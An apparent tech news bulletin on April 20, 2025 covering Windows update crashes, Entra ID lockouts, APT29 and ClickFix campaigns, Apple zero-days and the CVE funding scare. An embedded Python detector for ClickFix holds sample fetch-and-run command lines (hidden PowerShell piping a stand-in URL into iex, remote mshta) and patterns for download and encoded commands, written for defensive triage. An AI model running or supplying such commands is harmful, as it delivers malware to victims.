Software Industry News Bulletin: April 20, 2025 - Stability Issues, Security Threats, and Updates
Introduction
April 20, 2025, marked a day of significant developments within the software industry, heavily influenced by stability concerns surrounding Microsoft's key platforms. Reports surfaced of disruptive "Blue Screen of Death" (BSOD) errors affecting Windows 11 users following recent updates. Simultaneously, a problematic rollout of a new Microsoft Entra ID security feature led to widespread account lockouts for many organizations (BleepingComputer, 2025a). The cybersecurity front saw continued evolution, with state-sponsored actors reportedly adopting sophisticated social engineering tactics, alongside emerging phishing and mobile malware threats (The Hacker News, 2025a; BleepingComputer, 2025a). These events occurred shortly after critical security patches were released by Apple (Fingerlakes1.com, 2025) and amidst ongoing discussions about the funding stability of vital cybersecurity resources like the CVE program (Industrial Cyber, 2025). Routine updates from companies like Xiaomi, AMD, and Nippon Ichi Software also punctuated the day, highlighting continued innovation in mobile, hardware, and gaming sectors (XiaomiTime, 2025; GameGPU, 2025; Gematsu, 2025a). This post summarizes the key software news from April 20, 2025, based on available reports.
Section 1: Microsoft Platform Stability Under Scrutiny
The reliability of Microsoft's flagship operating system and identity management services faced significant questions on April 20th, as multiple issues stemming from recent software updates came to light, impacting users and administrators.
Subsection 1.1: Windows 11 Updates Trigger Blue Screen Crashes
Technology news outlets confirmed reports around April 20th of users experiencing BSOD system crashes on machines running Windows 11 version 24H2 (Techzine Europe, 2025; BleepingComputer, 2025b). The instability was linked to two recent Windows updates: the April 2025 cumulative security update KB5055523 (released April 8th) and the March 2025 preview update KB5053656 (BornCity, 2025; The Register, 2025a).
User reports indicated crashes typically occurred after restarting the system following update installation. The blue screen displayed the error code 0x18B, indicating a SECURE_KERNEL_ERROR, which suggests a problem within the core protected components of the operating system (Techzine Europe, 2025). While reports became widespread around April 20th, some evidence suggests instability may have started appearing shortly after the initial release of the updates (Microsoft Community, 2025).
Microsoft acknowledged the issue and updated support documentation for the affected updates (BleepingComputer, 2025b). As an immediate fix, the company initiated a Known Issue Rollback (KIR). This KIR mechanism allows Microsoft to remotely disable or revert the specific problematic change without requiring user action on consumer devices and unmanaged business PCs, typically propagating within 24 hours (BleepingComputer, 2025b). However, enterprise environments required manual intervention by IT administrators, who needed to download and deploy a specific Group Policy object using tools like the Group Policy Editor (BleepingComputer, 2025b). Microsoft stated that a permanent fix for the SECURE_KERNEL_ERROR would be included in a future update (TechPowerUp, 2025).
The emergence of a critical BSOD error linked to both a preview and a cumulative security update for the latest Windows 11 version (24H2) raises concerns about Microsoft's update validation process. The reliance on the reactive KIR mechanism suggests that a significant issue bypassed pre-release testing, potentially indicating gaps in the quality control pipeline for Windows 11 24H2 updates.
Subsection 1.2: Widespread Microsoft Entra ID Lockouts Linked to MACE Feature Rollout
Simultaneously, numerous organizations reported widespread user account lockouts in Microsoft Entra ID (formerly Azure Active Directory) starting around April 19th and continuing into April 20th (BleepingComputer, 2025a; BleepingComputer, 2025c). Administrators observed a sudden increase in alerts claiming user credentials were "leaked," leading to automatic account lockouts (Derdecker, 2025; Reddit, 2025).
Crucially, many administrators believed these alerts were false positives. Affected accounts often had unique, strong passwords, were protected by multi-factor authentication (MFA), and checks against breach notification services like Have I Been Pwned (HIBP) showed no evidence of compromise (Reddit, 2025). One managed detection and response provider reported over 20,000 such notifications overnight across its clients (BleepingComputer, 2025c).
Investigations pointed to the rollout of a new Microsoft Entra ID Enterprise application called "MACE Credential Revocation" as the root cause. This feature is designed to automatically lock accounts with potentially compromised credentials. However, its recent deployment, described by some as a "ninja rollout" due to lack of prior notice, appeared to generate numerous false positives (BleepingComputer, 2025c). Some administrators encountered error code 53003 related to conditional access policies during the lockouts (BleepingComputer, 2025c). As of April 20th, Microsoft was reportedly investigating and assisting affected organizations, but no broad public statement or universal resolution had been issued (BleepingComputer, 2025c).
This incident highlights the operational disruption possible when new security features in critical systems like identity management are rolled out without sufficient testing or clear communication, leading to legitimate users being locked out and requiring reactive support.
Subsection 1.3: Windows Hello Authentication Failures Emerge
Adding to the update issues, reports on April 20th indicated that the same April 2025 security update, KB5055523, was causing failures with Windows Hello authentication (facial recognition, PIN logins) on systems running Windows 11 24H2 and Windows Server 2025 (BleepingComputer, 2025d).
The problem seemed specific to devices with advanced security features like Dynamic Root of Trust for Measurement (DRTM) or System Guard Secure Launch enabled before the update. The failure often occurred after users performed a "Reset this PC" operation while choosing to keep personal files (BleepingComputer, 2025d). Affected users saw messages like "Something happened and your PIN isn't available" or "Sorry something went wrong with face setup" (BleepingComputer, 2025d). Microsoft acknowledged this "edge case" and provided workarounds involving re-enrolling Windows Hello credentials, but a definitive fix was not available as of April 20th (BleepingComputer, 2025d).
The fact that a single update (KB5055523) is linked to multiple distinct issues—Kerberos authentication problems (Microsoft Learn, 2025), potential BSODs (BleepingComputer, 2025b), and Windows Hello failures (BleepingComputer, 2025d)—underscores the complexity of modern OS updates and potential interactions between code, hardware, and security configurations.
Section 2: Cybersecurity Landscape: Sophisticated Threats and Vulnerabilities
The cybersecurity threat landscape on April 20th was characterized by reports of advanced persistent threat (APT) groups adopting new tactics, innovative phishing schemes, and the discovery of new mobile malware, all occurring shortly after significant zero-day patches were issued by major vendors.
Subsection 2.1: State-Sponsored Actors Escalate Tactics
A notable report detailed activities of the Russian state-sponsored threat actor APT29 (also known as Nobelium or Cozy Bear). Researchers linked the group to a sophisticated phishing campaign targeting diplomatic organizations in Europe (The Hacker News, 2025a). This campaign utilized a new variant of the WINELOADER malware backdoor and a previously undocumented malware loader named GRAPELOADER (The Hacker News, 2025a). GRAPELOADER acts as an initial tool for system fingerprinting, establishing persistence, and delivering the main payload. Analysis indicated GRAPELOADER employs more advanced anti-analysis and obfuscation techniques than APT29's previous tools, signaling an evolution in their capabilities (The Hacker News, 2025a).
Furthermore, a broader trend reported on April 20th involved multiple state-sponsored hacking groups (attributed to North Korea, Iran, and Russia) adopting the "ClickFix" social engineering tactic (The Hacker News, 2025b; Jacobson CPSC, 2024). ClickFix deceives users into executing malicious code (often PowerShell scripts) by presenting fake error messages or instructions that guide them to copy and paste commands, bypassing technical security controls (The Hacker News, 2025b; Field Effect, 2025; Group-IB, 2025). Examples included North Korea's Kimsuky group using ClickFix to deploy the Quasar RAT via fake meeting requests, and Iran-linked TA450 using lures to trick users into installing RMM software (The Hacker News, 2025b).
Originally popularized by cybercrime groups like TA571 or with malware like ClearFake (Proofpoint US, 2025), the adoption of ClickFix by nation-state actors signifies a convergence of tactics, leveraging user manipulation techniques honed by financially motivated criminals to achieve espionage goals (Logpoint, 2025; Sekoia.io Blog, 2025a; Sekoia.io Blog, 2025b; McAfee Blog, 2025; HHS.gov, 2025).
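The paste-and-run pattern described above leaves a recognizable trace in process-creation telemetry, and the following Python sketch triages such events for it. It is an added example, not code from any of the cited reports. The event field names, the sample events, the `explorer.exe` parent check (commands pasted into the Windows Run dialog start as children of Explorer), and the lure keywords are assumptions of this example.

```python
import re
from ntpath import basename  # parses Windows paths on any analysis host

# Constructed process-creation events (fields modelled on Sysmon Event ID 1).
# Hosts, users, paths and URLs are invented; example.invalid never resolves.
SAMPLE_EVENTS = [
    {"host": "WS-014", "user": "alice",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://example.invalid/fix.txt | iex"'
                ' # Verification ID: 48213'},
    {"host": "WS-027", "user": "bob",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/check.hta"
                " # I am not a robot: reCAPTCHA ID 7731"},
    # Benign: user opened PowerShell from the Start menu, no arguments.
    {"host": "WS-031", "user": "carol",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    # Benign: management agent (hypothetical path) running a local script.
    {"host": "WS-031", "user": "SYSTEM",
     "parent": r"C:\Program Files\Mgmt\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    # Benign: a URL opened from the Run dialog; one signal only.
    {"host": "WS-040", "user": "dave",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c start https://intranet.example.invalid/wiki"},
]

# Interpreters a pasted one-liner is typically handed to.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Independent command-line signals; any single one is common in benign use.
SIGNALS = {
    # A URL or a download cmdlet/alias in the command line.
    "remote_fetch": re.compile(
        r"https?://|\b(?:iwr|irm|curl|invoke-webrequest|invoke-restmethod"
        r"|downloadstring)\b", re.I),
    # In-memory execution, a hidden window, or an encoded command
    # (common spellings of the PowerShell switches).
    "hidden_or_in_memory": re.compile(
        r"\b(?:iex|invoke-expression)\b"
        r"|(?<!\S)-w\w*\s+h(?:id\w*)?\b"
        r"|(?<!\S)-e(?:nc\w*)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    # Human-facing text in a trailing comment: the part of the pasted
    # command the victim actually sees in the Run dialog.
    "lure_text": re.compile(
        r"(?:#|\brem\s|::).*\b(?:verif\w*|captcha|robot|human)\b", re.I),
}

MIN_SIGNALS = 2  # require two independent signals before alerting


def triage(event):
    """Return (flagged, matched_signal_names) for one process-creation event."""
    if basename(event["parent"]).lower() != "explorer.exe":
        return False, []
    if basename(event["image"]).lower() not in INTERPRETERS:
        return False, []
    hits = [name for name, rx in SIGNALS.items() if rx.search(event["cmdline"])]
    return len(hits) >= MIN_SIGNALS, hits


def flagged_hosts(events):
    """Sorted, de-duplicated hosts with at least one flagged event."""
    return sorted({e["host"] for e in events if triage(e)[0]})


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        flagged, hits = triage(ev)
        print(f'{ev["host"]:7} {"ALERT" if flagged else "ok":5} {", ".join(hits)}')
```

A command pasted into a terminal that is already open has the terminal as its parent, so this heuristic does not cover that variant and would need a separate rule.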
Subsection 2.2: Phishing and Malware Innovations
Other threats reported included a novel phishing attack abusing Google's OAuth authentication mechanism (BleepingComputer, 2025a). Attackers reportedly found a method, possibly involving DKIM replay attacks, to send fraudulent emails that appeared legitimately signed by Google, bypassing standard checks and increasing the likelihood of users clicking malicious links (BleepingComputer, 2025a).
In the mobile realm, a new Android malware-as-a-service (MaaS) platform named 'SuperCard X' was identified (BleepingComputer, 2025a). This malware targets Android devices to steal payment card information, primarily by facilitating Near Field Communication (NFC) relay attacks. This allows attackers to use stolen card data for fraudulent transactions at physical POS terminals or ATMs by relaying the NFC communication from the victim's phone (BleepingComputer, 2025a).
These attacks highlight attackers' focus on undermining systems and protocols users trust—exploiting confidence in Google's authentication and the assumed security of NFC mobile payments.
Subsection 2.3: Security Patching Context (Prior Day)
Crucial context for the April 20th events came from Apple, which had released an emergency security update (iOS 18.4.1) on April 19th (Fingerlakes1.com, 2025; Economic Times, 2025). This update addressed two critical zero-day vulnerabilities actively exploited in targeted attacks:
- CVE-2025-31200: A vulnerability in CoreAudio potentially allowing remote code execution via a maliciously crafted audio file (Fingerlakes1.com, 2025).
- CVE-2025-31201: A flaw in Apple's Remote Participant Audio Control (RPAC) allowing an attacker with device access to bypass Pointer Authentication Code (PAC) memory protections (Fingerlakes1.com, 2025).
The existence and active exploitation of these zero-days in a major mobile platform immediately preceding April 20th underscore the persistent and evolving threat landscape and the capability of sophisticated actors to discover and weaponize previously unknown vulnerabilities.
Table: Key Security Incidents/Vulnerabilities Reported Around April 20, 2025
Event/Threat Type | Details | Reported On/Context Date | Source(s) |
---|---|---|---|
Microsoft Windows BSOD | KB5055523/KB5053656 causing 0x18B error on Win11 24H2; KIR deployed | April 20, 2025 | (BleepingComputer, 2025a; Microsoft Learn, 2025) |
Microsoft Entra ID Lockouts | Widespread lockouts due to MACE feature rollout (false positives) | April 19/20, 2025 | (BleepingComputer, 2025a) |
Microsoft Windows Hello Issue | KB5055523 breaks Hello login (Face/PIN) post-reset w/ DRTM/SysGuard | April 20, 2025 | (BleepingComputer, 2025d) |
APT29 Phishing Campaign | Targeting EU diplomats; WINELOADER/GRAPELOADER malware | April 20, 2025 | (The Hacker News, 2025a) |
"ClickFix" Tactic Adoption | State-sponsored actors (NK, Iran, Russia) using social engineering | April 20, 2025 | (BleepingComputer, 2025a; Jacobson CPSC, 2024) |
Google OAuth Phishing | Abuse via DKIM replay attack | April 20, 2025 | (BleepingComputer, 2025a) |
Android NFC Relay Malware | 'SuperCard X' MaaS platform reported | April 20, 2025 | (BleepingComputer, 2025a) |
Apple Zero-Days (Context) | CVE-2025-31200, CVE-2025-31201 fixed in iOS 18.4.1 (actively exploited) | April 19, 2025 | (Fingerlakes1.com, 2025) |
Section 3: Software Updates and Industry Announcements
Amidst the security and stability concerns, routine software development and industry announcements continued on April 20th.
Subsection 3.1: Mobile OS Enhancements
Xiaomi announced or detailed important bug fixes for its Android-based HyperOS through an April 2025 update, with reports circulating on April 20th (XiaomiTime, 2025). This update specifically targeted issues reported by users following the global rollout of the operating system. Key fixes included resolving inconsistent media volume control and sudden volume adjustments experienced on Redmi Note 14 devices, and addressing a black screen issue encountered when connecting Redmi Note 14 Pro 5G phones to Android Auto infotainment systems. The update also aimed to fix notification delays on devices in the POCO series and incorporated general system stability improvements and optimizations, such as battery life enhancements for the Xiaomi 14 Ultra (XiaomiTime, 2025).
Subsection 3.2: Hardware and Gaming Software Developments
In the hardware sector, news emerged on April 20th that Advanced Micro Devices (AMD) is preparing to launch a new professional graphics card, tentatively identified as the Radeon PRO W9090 (GameGPU, 2025). This upcoming product is reportedly based on AMD's Navi 48 graphics processing unit (GPU), part of the RDNA 4 architecture, and is expected to feature a substantial 32 GB of memory (GameGPU, 2025). This move signals AMD's intent to compete strongly in the high-performance professional workstation market, targeting demanding applications in fields like artificial intelligence, content creation, engineering simulation, and scientific computing. While the official name and release date were not confirmed, speculation suggests an announcement could occur at a future AMD event focused on the professional sector, such as its "Advancing AI" series (GameGPU, 2025).
On the gaming software front, Japanese developer Nippon Ichi Software made announcements regarding its upcoming projects (Gematsu, 2025a). The company revealed five new titles were in development, including an action role-playing game (RPG) currently known by the project name "Kyouran," planned for release on PlayStation 5 and Nintendo Switch consoles in 2026 (Gematsu, 2025a). Additionally, a live stream event titled "Super Robot Wars Series News Station" was scheduled for April 20, 2025, indicating further news related to their popular strategy RPG franchise (Gematsu, 2025b).
These developments from Xiaomi, AMD, and Nippon Ichi Software, while distinct, collectively illustrate the ongoing activity in specialized market segments. AMD's focus is on the high-end professional GPU space driven by performance demands. Nippon Ichi caters to specific gaming niches. Xiaomi's HyperOS update responds directly to user-reported bugs on specific device models. This contrasts with the broad, platform-level stability issues reported for Microsoft, demonstrating that targeted development and refinement continue actively in parallel within various hardware and software niches, often driven by specific performance requirements, entertainment demands, or direct user feedback cycles.
Section 4: Cybersecurity Infrastructure: Recent Developments
While no new funding decisions were made on April 20th itself, the recent near-crisis surrounding the funding for the Common Vulnerabilities and Exposures (CVE) program likely remained a topic of discussion and concern within the cybersecurity community (Security This Week, 2025). The contract under which the non-profit MITRE Corporation operates the CVE program, with funding from the U.S. Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA), was set to expire on April 16, 2025 (Industrial Cyber, 2025; SecurityWeek, 2025; BleepingComputer, 2025e; The Hacker News, 2025c; The Register, 2025b).
This impending expiration triggered widespread alarm across the global cybersecurity industry just days before April 20th (Industrial Cyber, 2025; SecurityWeek, 2025; BleepingComputer, 2025e; The Hacker News, 2025c; The Register, 2025b). The CVE program provides the standardized identifiers (CVE IDs) used globally to track publicly disclosed software vulnerabilities, forming a foundational element for vulnerability management, security advisories, threat intelligence, and incident response (SecurityWeek, 2025). Concerns about a funding lapse included the potential inability of CVE Numbering Authorities (CNAs) to reserve and assign new CVE IDs, the possible deterioration or shutdown of the central CVE database and website, and the cascading negative impacts on security tools, vendor patching processes, and overall cyber defense coordination (Industrial Cyber, 2025; BleepingComputer, 2025e).
Fortunately, CISA secured and executed an 11-month funding extension late on April 16th or early April 17th, ensuring the program's continuity for the near term and averting an immediate crisis (SecurityWeek, 2025; Tenable, 2025; Cybernews, 2025). Concurrently, the formation of a new non-profit entity, The CVE Foundation, was announced, potentially offering a path towards more stable, long-term governance and funding independent of annual government contracting cycles (Krebs on Security, 2025). This entire episode unfolded while the National Institute of Standards and Technology (NIST) continues to face challenges processing a significant backlog of submitted CVEs for enrichment in its National Vulnerability Database (NVD), further highlighting the strains on the existing vulnerability management infrastructure (SecurityWeek, 2025).
The CVE funding scare, though resolved shortly before April 20th, served as a potent reminder of the cybersecurity ecosystem's reliance on critical, foundational programs that can be vulnerable to funding uncertainties or single points of failure. The rapid mobilization of the community—evidenced by efforts like VulnCheck proactively reserving CVE IDs (BleepingComputer, 2025e; Cybernews, 2025), calls for archiving the database (Krebs on Security, 2025), and the swift establishment of The CVE Foundation (Krebs on Security, 2025)—demonstrates both the perceived criticality of the CVE program and burgeoning efforts to build more resilient, perhaps more distributed or independently sustained, vulnerability information infrastructures. The recent launch of a European vulnerability database (EUVD) by ENISA also points towards diversification in this space. These discussions around the stability and future governance of essential cybersecurity infrastructure were undoubtedly still relevant context for the industry on April 20th.
Section 5: Other Developments
Beyond the major platform stability issues and cybersecurity threats, other minor activities and notable absences shaped the software news landscape on April 20, 2025.
Activity was noted within niche online communities, such as new posts appearing on the Amiga.org forum specifically dated April 20, 2025, indicating continued engagement within retro-computing and hobbyist software circles (Amiga.org, 2025).
However, based on the information available for April 20th, there was a lack of major new security advisories issued by key agencies like CISA (CISA, 2025). Similarly, prominent vulnerability databases such as Zero-Day.cz did not appear to list significant new entries specifically disclosed or updated on this date (Zero-Day.cz, 2025).
Furthermore, the provided materials did not contain reports of major software company mergers, acquisitions, significant partnership announcements, quarterly earnings releases, major strategic shifts, or high-level leadership changes specifically announced or taking effect on April 20, 2025. While there was information regarding ongoing Department of Defense software acquisition policy reforms, these directives originated in March 2025 (DefenseScoop, 2025a; DAU, 2025; AFCEA International, 2025; DefenseScoop, 2025b; HS Today, 2025). Other snippets discussing company earnings or M&A provided general context or related to older events (ReviewJournal.com, 2025; Bowery Capital, 2025; Springfield Business Journal, 2025; American Century Investments, 2025; TradeStation, 2024; Futunn, 2025; Investing.com, 2025; Lexmark Newsroom, 2025; Bureau of Economic Analysis, 2025).
Conclusion
April 20, 2025, was largely defined by significant stability issues impacting Microsoft's Windows 11 and Entra ID platforms. Multiple recent updates triggered blue screen crashes and authentication failures for Windows users, while a flawed rollout of a new security feature caused widespread, erroneous account lockouts in Entra ID, necessitating rollbacks and reactive support measures. These incidents highlight the persistent tension between deploying updates and new features rapidly and ensuring platform stability and reliability in complex software ecosystems.
Concurrently, the cybersecurity landscape showcased the increasing sophistication of threats. Reports detailed Russian state-sponsored group APT29's advanced phishing techniques and, more broadly, the concerning trend of nation-state actors from North Korea, Iran, and Russia adopting deceptive "ClickFix" social engineering tactics pioneered by cybercriminals. Novel attacks exploiting trust in Google's authentication systems and Android's NFC payment capabilities were also reported. These developments occurred against the backdrop of recent emergency zero-day patches from Apple and the narrowly averted funding crisis for the critical CVE vulnerability database, underscoring the dynamic and fragile nature of both cyber threats and the infrastructure used to combat them. Routine updates and announcements from Xiaomi, AMD, and Nippon Ichi Software indicated continued progress in specialized areas like mobile OS refinement, professional hardware, and gaming software, proceeding alongside the broader platform challenges. Overall, April 20th underscored the ongoing, complex interplay between software evolution, operational stability, and the ever-present cybersecurity risks.
References
AFCEA International. (2025). DoD reaffirms software acquisition pathway use. AFCEA Signal Media. https://www.afcea.org/signal-media/defense-operations/dod-reaffirms-software-acquisition-pathway-use
Amiga.org. (2025). Index. Amiga.org. https://forum.amiga.org/
American Century Investments. (2025). International Growth Fund. American Century Investments. https://res.americancentury.com/docs/IntlGrowth_Commentary.pdf
BleepingComputer. (2025a, April 20). Cybersecurity, technology news and support. BleepingComputer. https://www.bleepingcomputer.com/
BleepingComputer. (2025b, April 20). Microsoft warns of blue screen crashes caused by April updates. BleepingComputer. https://www.bleepingcomputer.com/news/microsoft/microsoft-warns-of-blue-screen-crashes-caused-by-april-updates/
BleepingComputer. (2025c, April 20). Widespread Microsoft Entra lockouts tied to new security feature rollout. BleepingComputer. https://www.bleepingcomputer.com/news/microsoft/widespread-microsoft-entra-lockouts-tied-to-new-security-feature-rollout/
BleepingComputer. (2025d, April 20). Microsoft: April 2025 updates break Windows Hello on some PCs. BleepingComputer. https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2025-updates-break-windows-hello-on-some-pcs/
BleepingComputer. (2025e, April 16). MITRE warns that funding for critical CVE program expires today. BleepingComputer. https://www.bleepingcomputer.com/news/security/mitre-warns-that-funding-for-critical-cve-program-expires-today/
BornCity. (2025, April 17). Windows 11 24H2: Update KB5055523 (April 8, 2025) may triggers a Blue Screen. Borncity. https://borncity.com/win/2025/04/17/windows-11-24h2-update-kb5055523-april-8-2025-may-triggers-a-blue-screen/
Bowery Capital. (2025). SaaS Perspectives: Jared Sleeper (Avenir). Bowery Capital Blog. https://bowerycap.com/blog/insights/saas-perspectives-jared-sleeper-avenir
Bureau of Economic Analysis. (2025). MP-5: Government Transactions. Bureau of Economic Analysis. https://www.bea.gov/sites/default/files/methodologies/mp5.pdf
CISA. (2025). Cybersecurity Alerts & Advisories. Cybersecurity and Infrastructure Security Agency. https://www.cisa.gov/news-events/cybersecurity-advisories
Cybernews. (2025, April 17). CVE database funding extended through 2026 – was the panic all for nothing?. Cybernews. https://cybernews.com/security/cve-database-funding-extended-cisa-mitre-corp/
DAU. (2025, March). DoD's Software Acquisition Pathway. Defense Acquisition University. https://www.dau.edu/sites/default/files/2025-03/LTA%20Software%20Acquisition%20Take%204%20Brady.pdf
DefenseScoop. (2025a, March 7). Hegseth issues edict on DOD software acquisition. DefenseScoop. https://defensescoop.com/2025/03/07/hegseth-memo-dod-software-acquisition-pathway-cso-ota/
DefenseScoop. (2025b, March 11). Pentagon gearing up to train personnel on new 'default' software buying approach. DefenseScoop. https://defensescoop.com/2025/03/11/dod-software-acquisition-pathway-training-email-hegseth/
Derdecker. (2025, April 19). Entra User at High Risk – leaked credentials. Cloud und mehr. https://www.derdecker.at/2025/04/19/entra-user-at-high-risk-leaked-credentials/
Economic Times. (2025, April 20). Apple iPhones get urgent iOS 18.4.1 update to fix actively exploited security bugs. The Economic Times. https://m.economictimes.com/news/international/us/apple-iphones-get-urgent-ios-18-4-1-update-to-fix-actively-exploited-security-bugs/articleshow/120412729.cms
Field Effect. (2025, April 18). ClickFix: The rising threat of social engineering through fake fixes. Field Effect Blog. https://fieldeffect.com/blog/clickfix-rising-threat-fake-fixes
Fingerlakes1.com. (2025, April 19). iOS 18.4.1 Emergency Update Fixes Two Major iPhone Security Flaws. Fingerlakes1.com. https://www.fingerlakes1.com/2025/04/19/ios-18-4-1-update-security-patch-zero-day-flaws-explained/
Futunn. (2025). Being included in the S&P 500 is not a dream! Benchmark: New Accounting Standards Will Significantly Boost MicroStrategy (MSTR.US) Earnings. Futu News. https://news.futunn.com/en/post/41589173/being-included-in-the-s-p-500-is-not-a
GameGPU. (2025, April 20). AMD is preparing a professional graphics card Radeon PRO W9090 based on Navi 48 with 32 GB of memory. GameGPU Hardware News. https://en.gamegpu.com/iron/amd-gotovit-professionalnuyu-video-card-radeon-pro-w9090-na-baze-navi-48-s-32-gb-memory
Gematsu. (2025a, April 20). Kyouran (Nippon Ichi Software). Gematsu. https://www.gematsu.com/games/kyouran-nippon-ichi-software
Gematsu. (2025b, April 20). Super Robot Wars Series News Station live stream set for April 20. Gematsu.
Group-IB. (2025, April 19). ClickFix: The Social Engineering Technique Hackers Use to Manipulate Victims. Group-IB Blog. https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/
HHS.gov. (2025). ClickFix Attacks. U.S. Department of Health & Human Services. https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf
HS Today. (2025, April 17). DOD Looking to Reform Software Acquisition. Homeland Security Today. https://www.hstoday.us/dod-national-defense/dod-looking-to-reform-software-acquisition/
Industrial Cyber. (2025, April 16). MITRE warns of potential cybersecurity disruptions as US government funding for CVE, CWE programs set to expire. Industrial Cyber. https://industrialcyber.co/threat-landscape/mitre-warns-of-potential-cybersecurity-disruptions-as-us-government-funding-for-cve-cwe-programs-set-to-expire/
Investing.com. (2025). Powell speech, ADP & JOLTS, CrowdStrike woe, SBF at NYT – what's moving markets. Investing.com UK. https://uk.investing.com/news/economy/powell-speech-adp--jolts-crowdstrike-woe-sbf-at-nyt--whats-moving-markets-2842800
Jacobson CPSC. (2024, October 23). The ClickFix Social Engineering Tactic. Jacobson CPSC - University of Calgary. https://wpsites.ucalgary.ca/jacobson-cpsc/2024/10/23/the-clickfix-social-engineering-tactic/
Krebs on Security. (2025, April 16). Funding Expires for Key Cyber Vulnerability Database. Krebs on Security. https://krebsonsecurity.com/2025/04/funding-expires-for-key-cyber-vulnerability-database/
Lexmark Newsroom. (2025). News Releases. Lexmark Newsroom. https://newsroom.lexmark.com/newsreleases?l=100&o=200
Logpoint. (2025, April 19). ClickFix: Another Deceptive Social Engineering Technique. Logpoint Blog. https://www.logpoint.com/en/blog/emerging-threats/clickfix-another-deceptive-social-engineering-technique/
McAfee Blog. (2025, April 18). ClickFix Deception: A Social Engineering Tactic to Deploy Malware. McAfee Blog. https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/
Microsoft Community. (2025, April 14). windows update issues April 14 2025. Microsoft Community. https://answers.microsoft.com/en-us/windows/forum/all/windows-update-issues-april-14-2025/a4178fb7-2ba1-44a3-bba6-6e19ea31dd28
Microsoft Learn. (2025). Windows 11, version 24H2 known issues and notifications. Microsoft Learn. https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-24h2
Proofpoint US. (2025, April 17). ClickFix Malware & Social Engineering Threat Grows. Proofpoint US Blog. https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
Reddit. (2025, April 19). New Entra "Leaked Credentials" - no breach on HIBP etc. r/sysadmin. https://www.reddit.com/r/sysadmin/comments/1k2pmkz/new_entra_leaked_credentials_no_breach_on_hibp_etc/
ReviewJournal.com. (2025). Merger with Las Vegas company to capitalize documentary producer. Las Vegas Review-Journal. https://www.reviewjournal.com/entertainment/merger-with-las-vegas-company-to-capitalize-documentary-producer-2092735/
Security This Week. (2025). Security This Week. Security This Week. https://www.securitythisweek.com/
SecurityWeek. (2025, April 16). MITRE Warns CVE Program Faces Disruption Amid US Funding Uncertainty. SecurityWeek. https://www.securityweek.com/mitre-signals-potential-cve-program-deterioration-as-us-gov-funding-expires/
Sekoia.io Blog. (2025a, April 19). ClickFix tactic: Revenge of detection. Sekoia.io Blog. https://blog.sekoia.io/clickfix-tactic-revenge-of-detection/
Sekoia.io Blog. (2025b, April 19). ClickFix tactic: The Phantom Meet. Sekoia.io Blog. https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/
Springfield Business Journal. (2025). Information Technology & Innovation. Springfield Business Journal. https://sbj.net/information-technology/index.html?page_size=20&category_id=170&sub_type=stories%2Cvideos%2Cphotos%2Cspecialsections%2Cprintissues%2Cpackages%2Cmagazines%2Cmaps%2Cfeeds%2Cpolls&list_type=most_commented&page=9
TechPowerUp. (2025, April 18). Windows 11 April Update Triggers BSOD, Breaks Windows Hello. TechPowerUp. https://www.techpowerup.com/335601/windows-11-april-update-triggers-bsod-breaks-windows-hello
Techzine Europe. (2025, April 18). Windows users may experience blue screen crashes after April updates. Techzine Europe. https://www.techzine.eu/news/applications/130617/windows-users-may-experience-blue-screen-crashes-after-april-updates/
Tenable. (2025, April 17). MITRE CVE Program Funding Extended For One Year. Tenable Blog. https://www.tenable.com/blog/mitre-cve-program-funding-set-to-expire
The Hacker News. (2025a, April 20). #1 Trusted Source for Cybersecurity News. The Hacker News. https://thehackernews.com/
The Hacker News. (2025b, April 19). State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns. The Hacker News. https://thehackernews.com/2025/04/state-sponsored-hackers-weaponize.html
The Hacker News. (2025c, April 16). U.S. Govt. Funding for MITRE's CVE Ends April 16, Cybersecurity Community on Alert. The Hacker News. https://thehackernews.com/2025/04/us-govt-funding-for-mitres-cve-ends.html
The Register. (2025a, April 16). March, April Windows 11 updates cause BSOD pain for users. The Register. https://www.theregister.com/2025/04/16/microsofts_latest_windows_updates/
The Register. (2025b, April 16). Homeland Security funding for CVE program expires. The Register. https://www.theregister.com/2025/04/16/homeland_security_funding_for_cve/
TradeStation. (2024, July 1). Technology and the Nasdaq Surged Back to Life in July. TradeStation Insights. https://www.tradestation.com/insights/2024/07/01/june-2024-recap/
XiaomiTime. (2025, April 20). Xiaomi releases highly important HyperOS bug fixes – April 2025 Update. XiaomiTime. https://xiaomitime.com/xiaomi-releases-highly-important-hyperos-bug-fixes-april-2025-update-39598/
Zero-Day.cz. (2025). Zero-day Vulnerability Database. Zero-day.cz. https://www.zero-day.cz/database/